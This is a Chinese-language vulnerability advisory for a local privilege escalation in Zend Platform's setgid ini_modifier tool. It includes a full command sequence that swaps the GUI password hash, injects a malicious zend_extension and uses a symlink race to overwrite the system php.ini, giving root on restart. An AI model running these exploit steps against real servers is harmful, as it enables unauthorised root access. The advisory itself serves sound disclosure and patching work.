受影响
系统:
Zend Zend
Platform <= 2.2.3
不受影响系统:
Zend Zend Platform 3.0
描述:
BUGTRAQ ID: 22802
Zend Platform是企业级
PHP应用的运行时平台环境。
Zend Platform软件包的ini_modifier工具在使用上存在漏洞,本地攻击者可能利用此漏洞提升权限。
在安装Zend Platform过程中安装了一个名为ini_modifier的suid组二进制程序。
$ ls -la /usr/local/Zend/sbin/ini_modifier
-rwxr-sr-x 1 root zendtech 243240 2006-08-14 16:24 ini_modifier
这个二进制程序用于从GUI编辑系统范围内的php.ini文件。为了防止滥用ini_modifier,在进行任何编辑之前都会提示GUI口令,但攻击者可以从php.ini读取GUI口令的MD5哈希并使用字典或彩虹表攻击破解,这样无需知道GUI口令便可以编辑php.ini文件,然后通过添加PHP扩展在下一次
服务器重启时获得root用户权限。
<*来源:Stefan Esser (
s.esser@ematters.de)
链接:
http://www.php-security.org/MOPB/BONUS-07-2007.html
http://www.zend.com/products/zen ... ity_vulnerabilities
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
$ cd /tmp
$ mkdir ini
$ cd ini
$ cp /usr/local/Zend/etc/php.ini .
... now edit zend_gui_password in
the copy to a MD5 of your choice and
... REMEBER the old MD5
$ cd ..
$ /usr/local/Zend/sbin/ini_modifier -f /tmp/ini/php.ini -n
Password:
(ini_modifier) help
modify entry - Modifies an entry.
switch extension - Enables or disables an extension.
switch zend_extension - Enables or disables a Zend extension.
help - Shows this help.
write - Writes the changes.
quit - Quits the program.
(ini_modifier) switch zend_extension /var/www/upload/evil.so on
(ini_modifier) modify entry Zend zend_gui_password OLDMD5
(ini_modifier)
在平行会话中执行以下操作:
$ cd /tmp
$ mv ini ini.bak
$ ln -s /usr/local/Zend/etc ini
继续编辑ini file文件:
(ini_modifier) write
(ini_modifier) quit
$ cat /usr/local/Zend/etc/php.ini
[PHP]
zend_extension=/var/www/upload/evil.so
...
zend_gui_password=OLDMD5
下一次重启
Web服务器时就会加载所注入的恶意Zend Extension并以root用户权限执行。
建议:
厂商补丁:
Zend
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页
下载:
http://www.zend.com/downloads
